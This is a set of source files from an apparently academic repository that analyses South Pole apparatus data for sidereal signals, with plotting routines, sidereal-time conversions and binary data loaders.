],\n [ \"sliceSorted\", \"SPfuncs_8py.html#a87aac33304db20fd58d7a3625061cca6\", null ],\n [ \"split_and_process_sequences\", \"SPfuncs_8py.html#ae43119e40ee34e8e5f67a1088548adb6\", null ],\n [ \"spSearchSet\", \"SPfuncs_8py.html#a1aca1da7012fa44af8ba6fb057c7ed1b\", null ],\n [ \"stringSimple3pt\", \"SPfuncs_8py.html#a7fb1286952274a8a185975238894be9d\", null ],\n [ \"stringSimple5pt\", \"SPfuncs_8py.html#a26157a1627869c31bfa6e494e5caf311\", null ],\n [ \"subtract_correlations\", \"SPfuncs_8py.html#ae33ce81936d04fd605560ec75ffe4a12\", null ],\n [ \"view_correlation_filtering\", \"SPfuncs_8py.html#af195e86c16fec9d60d1ac20dbe5d1f19\", null ],\n [ \"view_correlations\", \"SPfuncs_8py.html#a45a8e352a69cc8a225a32134c87cd120\", null ],\n [ \"view_raw\", \"SPfuncs_8py.html#a9c4d4bc9bf9302d2690f560af0d9982b\", null ],\n [ \"view_sidereal\", \"SPfuncs_8py.html#a40e964ab0b81bcee6065cfa0b5bde422\", null ],\n [ \"bTest\", \"SPfuncs_8py.html#a47dc9e4b5eebaf862bdd545eaff5c371\", null ],\n [ \"CorrelationData\", \"SPfuncs_8py.html#a97ee543cf8ac7b27443cbfe8ff2e20f3\", null ],\n [ \"D\", \"SPfuncs_8py.html#ae11ccbd488015737fccc78456a5a112f\", null ],\n [ \"dat\", \"SPfuncs_8py.html#a68243cfba6d3074cf6381b76546eec71\", null ],\n [ \"ds\", \"SPfuncs_8py.html#a5e62fc21df71cfdd96a1c0048b264295\", null ],\n [ \"LabSetData\", \"SPfuncs_8py.html#a98ebdcd3ceb3fa1b7bc74e8caf64b50d\", null ],\n [ \"N\", \"SPfuncs_8py.html#aaea13a6ab57b30bea3669d56fd489e30\", null ],\n [ \"nameL\", \"SPfuncs_8py.html#a7fe775d9cf2e94f97127d699a8b92579\", null ],\n [ \"PointData\", \"SPfuncs_8py.html#a1ffb0a48d6d36a1260a65e82c4604ce2\", null ],\n [ \"RawData\", \"SPfuncs_8py.html#a29a04cecefb141502380f4e43bc1d06d\", null ],\n [ \"res\", \"SPfuncs_8py.html#ab8ea55b3a0adfc5e8090a9a40db96e5a\", null ],\n [ \"RotationSpec\", \"SPfuncs_8py.html#abeb96363789885a36812850590fbfbab\", null ],\n [ \"rSpec\", \"SPfuncs_8py.html#a0fa8a32d68b3b6a1486926b952bd3676\", null ],\n [ \"SiderealFitData\", \"SPfuncs_8py.html#a8dd105859db0f7ebef805efb3c08dfb7\", null ],\n [ \"t\", \"SPfuncs_8py.html#ae6715e84e2c13a885096710a851aba3a\", null ],\n [ \"timestamps\", \"SPfuncs_8py.html#ab1cf4f0f232b2ccd32f08baa27263f1b\", null ],\n [ \"trigTimes\", \"SPfuncs_8py.html#a165fa263d040e95cba983de350ee563f\", null ],\n [ \"Window\", \"SPfuncs_8py.html#a5f881c246a0ac49955b33746df6c379b\", null ],\n [ \"window\", \"SPfuncs_8py.html#a4dc94cbb119a397cfee47da5a4681676\", null ]\n];" }, { "alpha_fraction": 0.4783715009689331, "alphanum_fraction": 0.7379134893417358, "avg_line_length": 72.71875, "blob_id": "4e90b51c79cb0f4ae1996d8866ed2064b608e960", "content_id": "151e5e486a5da7b21dec6e84bd285782d39ef52f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2358, "license_type": "no_license", "max_line_length": 86, "num_lines": 32, "path": "/html/SPgraphs_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var SPgraphs_8py =\n[\n [ \"analyseBy\", \"SPgraphs_8py.html#ac526cfdccd3db288e299b42806782f66\", null ],\n [ \"bgSub\", \"SPgraphs_8py.html#aa9ac03de8263ce020d5549a803aa2ec6\", null ],\n [ \"byDay\", \"SPgraphs_8py.html#ae66d67a1bdf6628e901a61a60a2ed75e\", null ],\n [ \"bySet\", \"SPgraphs_8py.html#a898320c98ec7a312c6a1d746636ec0be\", null ],\n [ \"bySetEarly\", \"SPgraphs_8py.html#a69817958c436311d169582bdc6f2c5cf\", null ],\n [ \"bySetLate\", \"SPgraphs_8py.html#ac4f9ba0c7d5b5bfadded9af98ee6890c\", null ],\n [ \"bySetSplit\", \"SPgraphs_8py.html#ae5d9b9902d318a31b3eb63b2063417de\", null ],\n [ \"directCompare\", \"SPgraphs_8py.html#a16e1ef7ee56ff5db216016a0a60cc909\", null ],\n [ \"dividedUp\", \"SPgraphs_8py.html#ad33224264e0377c3a57e53584e4c57e3\", null ],\n [ \"edit_infos\", \"SPgraphs_8py.html#a0b2bbf659ee5ec02aa5cb7daad91c280\", null ],\n [ \"EW\", \"SPgraphs_8py.html#a411259eb0330302f50db7c7f60330289\", null ],\n [ \"EWSplit\", \"SPgraphs_8py.html#aa915e36691f2aa1531d635c703e12d00\", null ],\n [ \"NS\", \"SPgraphs_8py.html#a629861d51c67e4ca35a7812367b67734\", null ],\n [ \"NSEW\", \"SPgraphs_8py.html#ac4784095475c5528bbf7b16553e32f69\", null ],\n [ \"NSEWSplit\", \"SPgraphs_8py.html#ad12531edaf503e50679f06d185f67f3b\", null ],\n [ \"NSSplit\", \"SPgraphs_8py.html#ac48db354437f1d670e7f339066acd8e3\", null ],\n [ \"plotAllSeq\", \"SPgraphs_8py.html#ab6f44a36f6d42154485b43e73c4eccf2\", null ],\n [ \"plotAllSyst\", \"SPgraphs_8py.html#a7c2c5cf3d0cd43b5b3cd9876f30fd51f\", null ],\n [ \"polDn\", \"SPgraphs_8py.html#a3ec55dabf6134d7fff5d974ff35af920\", null ],\n [ \"polDnSplit\", \"SPgraphs_8py.html#ac63344d1aeb7aa62c61dd21af0bb093d\", null ],\n [ \"polUp\", \"SPgraphs_8py.html#a7b29c4cfd4985b53c2ee0a982eec3760\", null ],\n [ \"polUpSplit\", \"SPgraphs_8py.html#a697fa8b8c89c0679ddea4fe27fa68714\", null ],\n [ \"Rot45\", \"SPgraphs_8py.html#a4d2979e542eb057ea841c0405afdc762\", null ],\n [ \"Rot45Split\", \"SPgraphs_8py.html#a7ee3da3bf8fa5dbbe668d1ec1417b62f\", null ],\n [ \"systComparison\", \"SPgraphs_8py.html#aebd49435534649c324ad4143d7f92a34\", null ],\n [ \"test\", \"SPgraphs_8py.html#a25db38c12dcefd76294477b9cd9eaf77\", null ],\n [ \"dsL\", \"SPgraphs_8py.html#a3308a4df9ead1d33bd7d39b4f686e118\", null ],\n [ \"figdir\", \"SPgraphs_8py.html#a0c498d7244fa703a63be3bb92d8b9a04\", null ],\n [ \"timestampL\", \"SPgraphs_8py.html#a04e4e5bc22270694ea4fbca149c08f09\", null ]\n];" }, { "alpha_fraction": 0.5644538998603821, "alphanum_fraction": 0.6002187132835388, "avg_line_length": 29.904573440551758, "blob_id": "50d75a61d1dceebca8632a0bce90235c1ba2a20a", "content_id": "c7d2a53286fc352b3686cd0d5310c638ad86d975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15546, "license_type": "no_license", "max_line_length": 168, "num_lines": 503, "path": "/SPgraphs.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"\nTODO:\n Need to actually calculate c, b coefficients and plot them. Initially this can just involve multiplying or not multiplying by the polarisation in the final result\n\"\"\"\nimport matplotlib as mpl\nmpl.rcParams['figure.figsize']=[13,11]\nfrom pylab import *\nimport SPDataSet as sd\nimport SPfuncs as spf\nimport pdb\nfrom MT import vprint\nfrom functools import partial\nfigdir='figs2'\n\n#2013 Data\ntimestampL=[\n'4803.31',\n'4812.51',\n'4818.33',\t\n'4827.26',\n'4833.40',\n'4834.39',\n'4838.50',\n'4840.65',\n'4850.54',\n'4857.47',\n'4859.39',\n'4864.65',\n'4865.75',\n'4867.48',\n'4868.41',\n'4869.74',\n'4876.97',\n'4881.71',\n'4885.53',\n'4888.50',\n'4889.50',\n'4894.57',\n'4898.68',\n'4901.78',\n'4902.85',\n'4903.58',\n'4906.58',\n'4911.09',\n'4914.07',\n'4929.88',\n'4938.05',\n'4945.09',\n'4953.70',\n'4959.91',\n'4966.95',\n]\n#timestampL=timestampL[:-6]\n\ntimestampL=[\n #'5209.26',\n #'5240.33',\n '5249.72',\n '5273.74',\n '5282.23',\n #'5292.71',\n '5294.31',\n #'5296.33',\n '5310.41',\n #'5318.41',\n '5348.82',\n '5369.87',\n '5386.02',\n '5390.74',\n '5410.04',\n '5410.87',\n '5411.92',\n '5415.95',\n '5420.00',\n #'5421.02',\n #'5422.00',\n '5422.80',\n '5424.94',\n]\ndsL=[sd.SPDataSet(ts) for ts in timestampL]\n\ndef edit_infos(dsLin=None):\n \"\"\"Walk through the datasets and display their metadata for editing/viewing\n \"\"\"\n if dsLin is None:\n dsLin =dsL\n\n for ds in dsLin:\n ds.edit_set_info()\n raw_input(\"Enter for next\")\n\nimport copy\ndef combinedD(d1, d2):\n out=copy.copy(d1); out.update(d2)\n return out\nNdiv=10\ndef analyseBy(datSetL=None, sidAmpDict={}, dsModifyF=None, generalF=None, plot=False):\n sidAmpL=[]\n if datSetL is None:\n datSetL=dsL\n for ds in datSetL:\n try:\n if dsModifyF is not None:\n ds, D=dsModifyF(ds, sidAmpDict)\n else:\n D=sidAmpDict\n #D= sidAmpDict(ds) if callable(sidAmpDict) else sidAmpDict\n\n if generalF is not None:\n amp=generalF(ds, D)\n else:\n amp=ds.sidAmp(**D)\n if amp is not None and not hasattr(amp, 't'):\n sidAmpL.extend(amp)\n else:\n sidAmpL.append(amp)\n\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Pol dn (split)')\n if not hasattr(plot, 'draw') and plot==True:\n figure()\n plot=gca()\n return spf.combine_angle_amps(sidAmpL, plot), sidAmpL\n\ndef polUp(plot=False, **kwargs):\n sidAmpL=[]\n #for ts in timestampL:\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(genSeqFiltF=sd.genSeqFiltPol(1),**kwargs))\n figure('Pol up (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef polDn(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:#timestampL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(genSeqFiltF=sd.genSeqFiltPol(-1),**kwargs))\n figure('Pol dn (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef polUpSplit(plot=False, **kwargs):\n sidAmpL=[]\n #for ts in timestampL:\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv), genSeqFiltF=sd.genSeqFiltPol(1), **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Pol up (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef polDnSplit(plot=False, **kwargs):\n sidAmpL=[]\n #for ts in timestampL:\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv), genSeqFiltF=sd.genSeqFiltPol(-1), **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Pol dn (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef byDay(plot=False, **kwargs):\n #By day\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n print(\"timestamp: {}\".format(ds.timestamp))\n sdL=ds.sidAmp(sd.seqFiltFuncTime(), **kwargs)\n if sdL is not None:\n if hasattr(sdL,'t'):\n sidAmpL.append(sdL)\n else:\n sidAmpL.extend(sdL)\n #if len(sidAmpL)==15:\n # pdb.set_trace()\n ds._cache.clear()\n #wtMn, calcedUnc, apparentUnc, wtErr= spf.combine_angle_amps(sidAmpL)\n #(ths, ys, covs)= zip(*[ MT.rotate_quadrature_sample(sAmp.labTheta, sAmp.sig, sAmp.err) for sAmp in ampL])\n\n #ys=array(ys)\n #ts=array(ts)\n #errs=array([sqrt(cov.diagonal()) for cov in covs]) #cheat and throw away covariance\n\n #figure()\n #for t, y, e in zip(ts.T, ys.T, errs.T):\n # errorbar( t, y, e, fmt='.') #Probaby not quite right\n #figure('By day')\n ax=gca()\n #mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(sidAmpl)\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bySetEarly(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n win=ds.set_info['windows']['sig']\n \n win['duration']=win['duration']/2\n sidAmpL.append(ds.sidAmp(sigWindow=spf.Window(**win)))\n #figure('Early')\n ax=gca()\n\n return spf.combine_angle_amps(sidAmpL,plot)\ndef bySetLate(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n win=ds.set_info['windows']['sig']\n #win=win._replace(offset=win.offset+win.duration/2)\n win['offset']=win['offset']+win['duration']/2\n #win=win._replace(duration=win.duration/2)\n win['duration']=win['duration']/2\n sidAmpL.append(ds.sidAmp(sigWindow=spf.Window(**win)))\n #figure('Late')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bySetSplit(plot=False, ):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv)))\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n #figure('By set, split-up')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bgSub(plot=False, ):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(subtractWindow='bg'))\n #figure('BG subtracted')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef bySet(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n print(\"timestamp: {}\".format(ds.timestamp))\n sAmp=ds.sidAmp(**kwargs)\n if hasattr(sAmp, 't'):\n sidAmpL.append()\n else: \n sidAmpL.extend(sAmp)\n ds._cache.clear()\n #figure('By set')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot), sidAmpL\n\ndef dividedUp(plot=False, ):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.extend(ds.sidAmp(sd.seqFiltFuncInterleave(Ndiv)))\n #figure('split up')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef NS(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(sd.seqFiltFuncAxis(0), label='NS Only', **kwargs))\n #figure('NS (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef EW(plot=False, **kwargs):\n sidAmpL=[]\n for ds in dsL:\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(sd.seqFiltFuncAxis(pi/2), label='EW only', **kwargs))\n #figure('EW (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef EWSplit(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFuncAxis(pi/2)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('EW (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef NSSplit(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFuncAxis(0)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('NS (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef NSEW(plot=False,):\n sidAmpL=[]\n for ds in dsL:\n #vprint(ts)\n #ds=sd.SPDataSet(ts)\n sidAmpL.append(ds.sidAmp(sd.seqFiltFunc2Axes(0)))\n #figure('NSEW (by set)')\n ax=gca()\n return spf.combine_angle_amps(sidAmpL,plot)\n\ndef NSEWSplit(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFunc2Axes(0)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ZeroDivisionError, ValueError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('NSEW (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef Rot45Split(plot=False, **kwargs):\n sidAmpL=[]\n def filt(seqAmp):\n return sd.seqFiltFuncInterleave(Ndiv)(sd.seqFiltFunc2Axes(pi/4)(seqAmp))\n for ds in dsL:\n try:\n mn, calcedUnc, apparentUnc, wEr=spf.combine_angle_amps(\n ds.sidAmp(filtF=filt, **kwargs)\n )\n sidAmpFull=ds.sidAmp()\n sidAmpL.append(spf.SiderealFitData(t=sidAmpFull.t, sig=mn, err=diag(apparentUnc)**2, chi2=None, sidTheta=sidAmpFull.sidTheta, labTheta=sidAmpFull.labTheta))\n except (ValueError, ZeroDivisionError):\n sys.exc_clear()\n #pass #Failed probably because there was no data, so we won't add it to the list\n #figure('Rot45 (split)')\n return spf.combine_angle_amps(sidAmpL, gca())\n\ndef Rot45(plot=False, ):\n sidAmpL=[]\n for ds in dsL:#timestampL:\n sidAmpL.append(ds.sidAmp(sd.seqFiltFunc2Axes(pi/4)))\n #figure('rot45 (by set)')\n #ax=gca()\n return spf.combine_angle_amps(sidAmpL, plot)\n\nsystL=[\n ('set', bySet),\n ('setVertSub', partial(bySet, coFitL='med:Vert Pos Det 2')),\n ('day', byDay),\n ('dayVertSub', partial(byDay, coFitL='med:Vert Pos Det 2')),\n ('sets_S', bySetSplit),\n ('alldivided', dividedUp),\n ('bgSub', bgSub),\n ]\nportionL=[\n ('axes0', NSEW),\n ('axes45', Rot45),\n ('EW', EW),\n ('NS', NS),\n ('polUp', polUp),\n ('polDn', polDn),\n ('setEarly', bySetEarly),\n ('setLate', bySetLate),\n ]\nportionSplitL=[\n ('axes0_S', NSEWSplit),\n ('axes45_S', Rot45Split),\n ('EW_S', EWSplit),\n ('NS_S', NSSplit),\n ('polUp_S', polUpSplit),\n ('polDn_S', polDnSplit),\n #('setEarly', bySetEarlySplit),\n #('setLate', bySetLateSplit),\n ]\n\ndef directCompare():\n L=portionL\n for k in range(len(L)/2):\n name1, f1=L[2*k]\n name2, f2=L[2*k+1]\n fig=figure(name1 + ' vs ' + name2)\n ax1=subplot(211)\n ax2=subplot(212)\n f1(plot=[ax1,ax2])\n f2(plot=[ax1,ax2])\n fig.savefig(figdir+'/{} vs {}.pdf'.format(name1,name2))\n\ndef systComparison(L, axL=None):\n labels, dat=zip(*[(label, f()) for label, f in L])\n mnL, trustUncL, apparentUncL, wErL = zip(*dat)\n mnL=array(mnL);\n trustUncL=array(trustUncL);\n apparentUncL=array(apparentUncL)\n if axL==None:\n figure()\n ax1=gca()\n figure()\n ax2=gca()\n axL=[ax1, ax2]\n else:\n ax1,ax2=axL\n\n xpos=arange(len(mnL))\n k=0\n for mn, appUnc, trustUnc, ax in zip(mnL.T, apparentUncL.T, trustUncL.T, axL):\n ax.errorbar(xpos, mn, appUnc, fmt='o', elinewidth=2, capthick=2) \n ax.errorbar(xpos, mn, trustUnc, fmt=None, elinewidth=2, capthick=2) \n ax.set_xticks(xpos)\n ax.set_xticklabels(labels)\n ax.set_xlim([-0.5, len(mnL)+0.5])\n ax.set_ylabel('fT')\n ax1.set_title('x-quad')\n ax2.set_title('y-quad')\n ax1.grid(True)\n ax2.grid(True)\n return labels, dat\n\ndef plotAllSyst():\n k=1\n for L in [systL, portionL, portionSplitL]: \n fig=figure()\n ax1=subplot(211)\n ax2=subplot(212)\n systComparison(L,[ax1,ax2])\n fig.savefig(figdir+'/systematic {}.pdf'.format(k))\n k+=1\n\ndef plotAllSeq():\n for ds in dsL:\n ds.viewSeq()\n tight_layout()\n savefig(figdir+\"/{0}:corr.png\".format(ds.timestamp))\n\n ds.viewSeq(sigWindow='bg')\n tight_layout()\n savefig(figdir+\"/{0}:corr_bg.png\".format(ds.timestamp))\n\n ds.viewCorrelationFilt()\n tight_layout()\n savefig(figdir+\"/{0}:corr_filt.png\".format(ds.timestamp))\n ds.clearRaw()\n\ndef test():\n ds=sd.SPDataSet('5369.87')\n sAmp1=ds.sequenceAmp(sigWindow=spf.Window(2.5,-5.5))\n sAmp2=ds.sequenceAmp(sigWindow=spf.Window(2.5,-3))\n pAmp1=ds.pointAmp(sigWindow=spf.Window(2.5,-5.5))\n pAmp2=ds.pointAmp(sigWindow=spf.Window(2.5,-3))\n\n #sAmp1=ds.sequenceAmp(sigWindow=spf.Window(3.25,-6.5))\n #sAmp2=ds.sequenceAmp(sigWindow=spf.Window(3.25,-3.25))\n #pAmp1=ds.pointAmp(sigWindow=spf.Window(3.25,-6.5))\n #pAmp2=ds.pointAmp(sigWindow=spf.Window(3.25,-3.25))\n\n sig1=sAmp1.sig.ravel()\n sig2=sAmp2.sig.ravel()\n err1=sAmp1.err.ravel()\n err2=sAmp2.err.ravel()\n t=sAmp1.t.ravel()\n figure()\n fit, (ax1,ax2)=subplots(2,1, sharex=True)\n ax1.plot(pAmp1.t.ravel(), pAmp1.sig.ravel())\n ax1.plot(pAmp2.t.ravel(), pAmp2.sig.ravel())\n ax2.errorbar(t, sig1, err1, fmt='.')\n ax2.errorbar(t, sig2, err2, fmt='.')\n\n" }, { "alpha_fraction": 0.5400130152702332, "alphanum_fraction": 0.6636304259300232, "avg_line_length": 29.13725471496582, "blob_id": "4bfbde20b74e437619ac849a92ff93de94e03488", "content_id": "22bfe0bcc7a04e244f41b2e946443304a3fb1d1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1537, "license_type": "no_license", "max_line_length": 156, "num_lines": 51, "path": "/sdtime.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "from __future__ import division\nfrom math import floor\nimport time\n#y2000=time.struct_time([2000,1,0,0,0,0,0,0,0]);\ny2000secs= 946684800# time.mktime(y2000);\nsecsPerSidDay= 86164.0905#( 23.9344696*3600);\nFF=0.277715#0.7222841#*0.2776;\n\ndef secs2sd(t):\n return (t-y2000secs)/secsPerSidDay + FF #Fudge factor for some reason\ndef sd2secs(sd):\n return (sd-FF)*secsPerSidDay+y2000secs\ndef sd2gm(sd):\n return time.gmtime(sd2secs(sd))\ndef sd2local(sd):\n return time.localtime(sd2secs(sd))\ndef sdNow():\n return secs2sd(time.time());\ndef loc2sd(ltime_str, fmt=None):\n #raise NotImplementedError\n if fmt:\n ltime=time.strptime(ltime_str, fmt)\n elif fmt is None:\n fmt='%m %d %Y'\n try:\n ltime=time.strptime(ltime_str, fmt)\n except ValueError:\n fmt='%c'\n ltime=time.strptime(ltime_str,fmt)\n return secs2sd(time.mktime(ltime))\n \n\n\ndef solarDaysSinceY2000(unixTime=None):\n if unixTime==None:\n unixTime=time.time();\n return (unixTime + 3029572800.)/86400.\n\ndef siderealTimeKornack(unixTime=None):\n return (280.46061837 + 360.98564736629 * solarDaysSinceY2000(unixTime))/360.;\n\ndef siderealTimeMeesus(T=None):\n if T==None:\n T=time.gmtime()\n return 367*T.tm_year-floor(7*(T.tm_year+floor((T.tm_mon+9)/12))/4)+floor(275*T.tm_mon/9) +T.tm_mday+(T.tm_hour+T.tm_min/60+T.tm_sec/3600)/24-730531.5 \n\ndef siderealTimeMe(T=None):\n if T==None:\n T=time.time();\n T-=946684800\n return T/secsPerSidDay#/secsPerSidDay#30*366.242199\n" }, { "alpha_fraction": 0.6071916222572327, "alphanum_fraction": 0.6490669250488281, "avg_line_length": 33.82539749145508, "blob_id": "3e06f1904bee62ef8cf19fabf18f6cca6d05f82c", "content_id": "801eed8662d37ad02b02e3d867b2d5ee63f263ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2197, "license_type": "no_license", "max_line_length": 116, "num_lines": 63, "path": "/openCPT.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom os import path\nimport os\nimport re\n\nbase_dir=os.environ['SP_DATA_DIR']\nddir= \"/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5240.33 Bundle/\"\nfilepath=ddir+\"SP_aparatus 5240.33 Medium 2.bin\"\n\n\ntemplate_regex='SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) {0}( \\d+)?\\.bin'\n\ndef loadApparatusFiles(root_path, useMetaFile=True):\n dirname=path.dirname(root_path) \n rootname=path.basename(root_path) \n r=re.compile('{0}( \\d+)?\\.bin'.format(rootname))\n dlist=os.listdir(dirname);\n dlist=[st for st in dlist if r.match(st)]\n dlist.sort( key=lambda st: int(r.match(st).groups()[0]) ) # dlist is now sorted\n \n dat_list=[openFile(path.join(dirname, fname), useMetaFile=useMetaFile) for fname in dlist]\n # Combine these into a single file...\n\n dat=np.hstack(dat_list)\n #datnames=dat_list[0].keys()\n return dat\n\ndef openFile(filepath, nVars=1, useMetaFile=False, endian='>'):\n timeDataType=[('sd', endian+'f8')]\n if useMetaFile:\n fname_components=path.splitext(filepath)[0].split(' ')\n if fname_components[-1].isdigit():\n fname_components.pop()\n meta_file_path=' '.join(fname_components) + '.meta'\n if path.exists(meta_file_path):\n mfile=open(meta_file_path)\n elif path.exists(meta_file_path+'.txt'):\n mfile=open(meta_file_path+'.txt')\n else:\n raise IOError\n sigNames=mfile.readlines()\n sigNames=[name.strip() for name in sigNames]\n if sigNames[0]=='Sidereal Days':\n sigNames=sigNames[1:]\n nVars=len(sigNames)\n sigDataType=[(name, endian+'f4') for name in sigNames]\n\n else:\n sigDataType=[('s{0}'.format(n), endian+'f4') for n in range(1,nVars+1)]\n\n\n\n totalDataType=timeDataType+sigDataType\n print(\"total dtype: {0}\".format(totalDataType))\n dat=np.fromfile(filepath, totalDataType)\n\n return dat;\n\nif __name__==\"__main__\":\n\n ddir= \"/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5240.33 Bundle/\"\n filepath=ddir+\"SP_aparatus 5240.33 Medium 2.bin\"\n dat=loadApparatusFiles(ddir+'SP_aparatus 5240.33 Medium')\n\n\n\n" }, { "alpha_fraction": 0.629983127117157, "alphanum_fraction": 0.6479505896568298, "avg_line_length": 28.180328369140625, "blob_id": "9af728840b28d6594ace2ce9b0d6869513241283", "content_id": "af0734c187644f62c10471532789e2bf6df7e1a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 94, "num_lines": 61, "path": "/getSPdata.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "from os import path\nfrom os import environ\n\ndef getSPData(timestamp, rotations, interval, delay):\n\n base_data_dir=environ['SP_DATA_DIR'];\n\n ddir=path.join(base_data_dir, 'SP_aparatus {0} Bundle'.format(timestamp))\n\n [sdF,sigF,sdM,sigM,sdRe,sigRe,sdS,sigS,medNames,reNames,sloNames]=loadCPTFiles(timestamp);\n\n% Get triggers either by making them if parameters are given or loading\n% them from the triggers file if available\nif nargin>1\n trig=makeTrigM(sdF,rotations,interval,delay);\n if trig(end)>sdF(end)\n trig=trig(1:end-rotations);\n end\nelse\n trig=[];\n 